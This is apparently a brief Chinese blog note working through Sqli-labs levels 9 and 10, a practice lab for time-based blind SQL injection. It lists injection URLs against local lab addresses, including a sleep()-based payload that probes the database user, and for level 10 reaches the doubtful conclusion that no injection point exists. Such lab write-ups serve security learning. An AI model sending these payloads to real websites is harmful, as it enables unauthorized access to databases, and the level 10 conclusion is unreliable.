Sqli-labs Less9-10时间盲注

Less9

输入and来判断不管输入什么都显示一样
输入url地址http://192.168.31.94/Less-9/?id=2' and 1=1 --+
还是显示You are in...........

输入url地址http://192.168.31.94/Less-9/?id=2'
还是一样显示You are in...........

直到用到sql时间盲注
输入url地址http://192.168.31.94/Less-9/?id=1 ' and if(left(user(),1)='q',0,sleep(5)) --+

读取当前数据库

这个太麻烦而且还慢可以自己
写一个sql时间盲注脚本应为我时间不多，有时间在写

less10

下面这个测试我就把前面的文件的测试的给复现下来了
第10关
输入http://192.168.0.102/Less-10/?id=1
返回You are in………..

输入http://192.168.0.102/Less-10/?id=1'
返回You are in………..

输入http://192.168.0.102/Less-10/?id=1' and '1' =' 1 --+
返回You are in………..

输入http://192.168.0.102/Less-10/?id=1' and '1' =' 2 --+
还是返回返回You are in………..

输入192.168.0.102/Less-10/?id=1' ) or ('a'='a --+
还是返回还是返回返回You are in………..

等等等等等等等等等等等等等等其他方法我就不演示了
发现根本就没有注入点

读取当前数据库

这个太麻烦而且还慢可以自己
写一个sql时间盲注脚本应为我时间不多，有时间在写